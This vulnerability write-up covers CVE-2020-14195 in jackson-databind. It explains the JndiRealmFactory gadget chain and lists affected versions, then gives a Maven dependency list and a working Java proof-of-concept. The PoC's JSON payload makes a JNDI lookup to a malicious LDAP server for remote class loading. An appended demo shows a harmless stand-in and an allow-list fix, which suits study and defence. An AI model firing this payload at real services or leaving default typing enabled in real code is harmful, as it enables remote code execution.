(CVE-2020-14195) FasterXML jackson-databind deserialization vulnerability
1. Vulnerability overview
Exploitation requires two things: default typing is enabled on the ObjectMapper (enableDefaultTyping()), and the third-party dependency org.jsecurity, which provides the gadget class org.jsecurity.realm.jndi.JndiRealmFactory, is on the classpath.
2. Affected versions
jackson-databind 2.9.x before 2.9.10.5 (the 2.9.10.4 used in the reproduction below is still affected)
jackson-databind 2.8.x before 2.8.11.6
jackson-databind 2.7.x before 2.7.9.7
3. Reproduction
Vulnerability analysis
First locate the class org.jsecurity.realm.jndi.JndiRealmFactory. Its getRealms() method contains a suspicious JNDI lookup (figure 1): the name argument handed to lookup is read from i$ (the name javac gives the hidden for-each iterator, as shown by the decompiler), and i$ iterates over jndiNames. To reach lookup, the preceding if condition must be satisfied, i.e. jndiNames must be neither null nor empty. So when building the PoC it is enough to assign jndiNames directly and point it at our malicious LDAP server (figure 2). The full chain is:
mapper.readValue
->setJndiNames
->getRealms
->lookup
readValue instantiates the class named in the payload and calls the setJndiNames setter with the attacker-controlled string; the getter getRealms, and through it lookup, runs when Jackson serializes the object again with writeValueAsString, which is why the PoC below calls both.
Reproduction
The pom.xml is as follows:
<dependencies>
    <dependency>
        <groupId>com.fasterxml.jackson.core</groupId>
        <artifactId>jackson-databind</artifactId>
        <version>2.9.10.4</version>
    </dependency>
    <!-- https://mvnrepository.com/artifact/org.jsecurity/jsecurity -->
    <dependency>
        <groupId>org.jsecurity</groupId>
        <artifactId>jsecurity</artifactId>
        <version>0.9.0</version>
    </dependency>
    <dependency>
        <groupId>org.slf4j</groupId>
        <artifactId>slf4j-nop</artifactId>
        <version>1.7.2</version>
    </dependency>
    <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
    <dependency>
        <groupId>javax.transaction</groupId>
        <artifactId>jta</artifactId>
        <version>1.1</version>
    </dependency>
</dependencies>
Vulnerability PoC:
package com.jacksonTest;

import com.fasterxml.jackson.databind.ObjectMapper;

import java.io.IOException;

public class Poc {
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        // Vulnerable configuration: any class on the classpath may be named as the type id.
        mapper.enableDefaultTyping();
        // WRAPPER_ARRAY form ["fqcn", {...}]; jndiNames points at the attacker's LDAP server
        // (127.0.0.1:1099 is where the malicious LDAP service was started for this test).
        String payload = "[\"org.jsecurity.realm.jndi.JndiRealmFactory\",{\"jndiNames\":\"ldap://127.0.0.1:1099/Exploit\"}]";
        try {
            // readValue -> JndiRealmFactory.setJndiNames("ldap://...")
            Object obj = mapper.readValue(payload, Object.class);
            // writeValueAsString -> getRealms() -> lookup(name) -> JNDI/LDAP -> remote class load
            mapper.writeValueAsString(obj);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
Run the program: the command is executed and the calculator pops up (figure 3).
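The class below is an added illustration and is not part of the original post, of jsecurity or of Jackson. It shows both halves of the chain without any LDAP server, and the ObjectMapper configuration that stops it. FakeJndiRealmFactory is a hypothetical stand-in with the same bean shape as JndiRealmFactory (a String-typed setJndiNames, a Collection-typed getRealms that walks jndiNames); its "lookup" only records the name it was given. The package com.jacksonTest.model used in the allow-list is an assumed application package. The vulnerable half runs against the 2.9.10.4 from the pom above; the hardened half needs jackson-databind 2.10 or later for activateDefaultTyping and BasicPolymorphicTypeValidator.

```java
package com.jacksonTest;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.List;

public class JndiGadgetDemo {

    // Records every name the stand-in gadget would have handed to JNDI lookup().
    public static final List<String> LOOKED_UP = new ArrayList<>();

    // Hypothetical stand-in for org.jsecurity.realm.jndi.JndiRealmFactory, built for
    // this example: same bean shape, but the JNDI lookup is replaced by a record.
    public static class FakeJndiRealmFactory {
        private Collection<String> jndiNames;

        // Jackson calls this during readValue(); the real class also splits on commas.
        public void setJndiNames(String commaDelimited) {
            this.jndiNames = Arrays.asList(commaDelimited.split(","));
        }

        public Collection<String> getJndiNames() {
            return jndiNames;
        }

        // Jackson calls every getter during writeValueAsString(); in the real class the
        // loop body is lookup(name, Realm.class), i.e. a JNDI lookup of an attacker-chosen name.
        public Collection<String> getRealms() {
            if (jndiNames == null || jndiNames.isEmpty()) {
                throw new IllegalStateException("jndiNames must be set");
            }
            List<String> realms = new ArrayList<>();
            for (String name : jndiNames) {
                LOOKED_UP.add(name);
                realms.add("realm-from-" + name);
            }
            return realms;
        }
    }

    // Same shape as the page's payload, pointed at the stand-in class.
    static final String PAYLOAD =
        "[\"com.jacksonTest.JndiGadgetDemo$FakeJndiRealmFactory\","
        + "{\"jndiNames\":\"ldap://127.0.0.1:1099/Exploit\"}]";

    // The PoC's configuration: any class on the classpath may be named in the type id.
    static String runVulnerable() throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();                         // deprecated since 2.10, still honoured
        Object obj = mapper.readValue(PAYLOAD, Object.class); // -> new FakeJndiRealmFactory(), setJndiNames("ldap://...")
        return mapper.writeValueAsString(obj);                // -> getRealms() -> "lookup" of the attacker's name
    }

    // Hardened configuration (jackson-databind 2.10+): default typing only with an explicit
    // allow-list, so the type id above is refused before the class is instantiated.
    static String runHardened() throws Exception {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            .allowIfSubType("com.jacksonTest.model.")  // hypothetical package holding the app's own DTOs
            .build();
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        try {
            mapper.readValue(PAYLOAD, Object.class);
            return "deserialized (unexpected)";
        } catch (InvalidTypeIdException e) {
            return "rejected type id: " + e.getTypeId();
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(runVulnerable());
        System.out.println("names handed to lookup(): " + LOOKED_UP);
        System.out.println(runHardened());
    }
}
```

Running it shows the getter firing on the attacker-supplied ldap:// name in the first case and an InvalidTypeIdException carrying the class name in the second. The allow-list is the structural fix: it holds against gadget classes that are not yet on Jackson's blocklist, which is why it is preferable to relying on the version bump alone. When polymorphic deserialization is not actually needed, the simplest fix is to leave default typing off entirely.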
References
https://xz.aliyun.com/t/8012#toc-18